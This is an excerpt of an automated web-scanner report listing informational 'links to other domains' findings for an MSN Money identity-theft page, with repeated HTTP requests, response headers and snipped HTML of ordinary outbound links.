<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/how-to-invest/default.aspx" alt="New Investor Center" shape="rect" coords="15,1,263,72" /><area href="http://clk.atdmt.com/BEL/go/115817003/direct/01/" alt="Sharebuilder" shape="rect" coords="750,10,894,68" /></map>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.192. http://money.redacted/identity-theft/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /identity-theft/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains, shown in the response excerpt below.

Request

GET /identity-theft/default-dyn.aspx?cp-documentid=6782998&GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:44 GMT
Content-Length: 52868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353384&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Please tell us what you think</a>
...[SNIP]...
<p><a href="http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/">Why do employers care about your credit?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">Track your money</a>
...[SNIP]...
<li class="first"><a href="http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach">1,800 patient names, dates of service and certain clinical information exposed due to email breach</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car">1000 names and Social Security numbers of employees stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car">Laptop with 10,684 unencrypted names, Social Security numbers, address and salary for every employee receiving a W-2 stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service">Documents containing sensitive personal details accidentally disposed of at a local recycling bank by the Scottish Court Service</a>
...[SNIP]...
<li class="last"><a href="http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker">1000 patient names, addresses, health and dental insurance member numbers, Social Security Numbers, dates of birth, dental care records, and dental x-rays may have been accessed by hacker</a>
...[SNIP]...
</div><a class="more" href="http://datalossdb.org/">Data provided by Open Security Foundation</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&amp;form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&amp;form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&amp;form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&amp;go=&amp;form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&amp;form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=does+credit+counseling+work&amp;form=money3">Does credit counseling really help?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.193. http://money.redacted/identity-theft/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /identity-theft/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /identity-theft/default-dyn.aspx?cp-documentid=6782998&GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:56:04 GMT
Content-Length: 52868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410164&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Please tell us what you think</a>
...[SNIP]...
<p><a href="http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/">Why do employers care about your credit?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">Track your money</a>
...[SNIP]...
<li class="first"><a href="http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach">1,800 patient names, dates of service and certain clinical information exposed due to email breach</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car">1000 names and Social Security numbers of employees stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car">Laptop with 10,684 unencrypted names, Social Security numbers, address and salary for every employee receiving a W-2 stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service">Documents containing sensitive personal details accidentally disposed of at a local recycling bank by the Scottish Court Service</a>
...[SNIP]...
<li class="last"><a href="http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker">1000 patient names, addresses, health and dental insurance member numbers, Social Security Numbers, dates of birth, dental care records, and dental x-rays may have been accessed by hacker</a>
...[SNIP]...
</div><a class="more" href="http://datalossdb.org/">Data provided by Open Security Foundation</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&amp;form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&amp;form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&amp;form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&amp;go=&amp;form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&amp;form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=does+credit+counseling+work&amp;form=money3">Does credit counseling really help?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.194. http://money.redacted/identity-theft/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /identity-theft/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /identity-theft/default-dyn.aspx?cp-documentid=6782998&GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=a81edef2bc9d42f88e3f3fcae53eb821; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:51:02 GMT
Content-Length: 52868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406263&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Please tell us what you think</a>
...[SNIP]...
<p><a href="http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/">Why do employers care about your credit?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">Track your money</a>
...[SNIP]...
<li class="first"><a href="http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach">1,800 patient names, dates of service and certain clinical information exposed due to email breach</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car">1000 names and Social Security numbers of employees stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car">Laptop with 10,684 unencrypted names, Social Security numbers, address and salary for every employee receiving a W-2 stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service">Documents containing sensitive personal details accidentally disposed of at a local recycling bank by the Scottish Court Service</a>
...[SNIP]...
<li class="last"><a href="http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker">1000 patient names, addresses, health and dental insurance member numbers, Social Security Numbers, dates of birth, dental care records, and dental x-rays may have been accessed by hacker</a>
...[SNIP]...
</div><a class="more" href="http://datalossdb.org/">Data provided by Open Security Foundation</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&amp;form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&amp;form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&amp;form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&amp;go=&amp;form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&amp;form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=does+credit+counseling+work&amp;form=money3">Does credit counseling really help?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.195. http://money.redacted/identity-theft/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /identity-theft/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /identity-theft/default-dyn.aspx?cp-documentid=6782998&GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=f60556dbeea04a45aeff6a725b46a741; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:03 GMT
Content-Length: 52868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344884&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Please tell us what you think</a>
